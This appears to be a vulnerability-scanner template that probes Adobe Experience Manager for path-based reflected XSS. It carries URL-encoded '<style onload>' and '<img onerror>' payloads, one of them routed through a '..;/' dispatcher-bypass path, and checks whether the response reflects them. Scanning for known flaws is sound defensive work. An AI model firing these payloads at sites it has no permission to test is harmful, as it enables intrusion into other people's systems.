id: aem-path-xss
info:
  name: AEM XSS Generic - Path Based
  risk: Medium

params:
  - root: "{{.BaseURL}}"

variables:
  - rand: |
      jzzi
  - endpoint: |
      1.childrenlist.html
      1.childrenlist/

requests:
  # verify
  - method: GET
    redirect: false
    headers:
      - Referer: '{{.BaseURL}}'
    url: >-
      {{.root}}/{{.rand}}%3Cstyle%20onload=%22alert(1)%22%20contenteditable%3E{{.endpoint}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", 'text/html') && StringSearch("response", '<style onload="alert(1)"')

  - method: GET
    redirect: false
    headers:
      - Referer: '{{.BaseURL}}'
    url: >-
      {{.root}}/{{.rand}}%3Cimg%20src=x%20data%27a%27onerror=alert(1)%3E{{.endpoint}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", 'text/html') && StringSearch("response", '<img src="x" data onerror="alert(1)"/>')

  - method: GET
    redirect: false
    headers:
      - Referer: '{{.BaseURL}}'
    url: >-
      {{.root}}/content/..;/{{.rand}}%3Cimg%20src=x%20data%27a%27onerror=alert(1)%3E{{.endpoint}}
    detections:
      - >-
        StatusCode() == 200 && StringSearch("resHeaders", 'text/html') && StringSearch("response", '<img src="x" data onerror="alert(1)"/>')
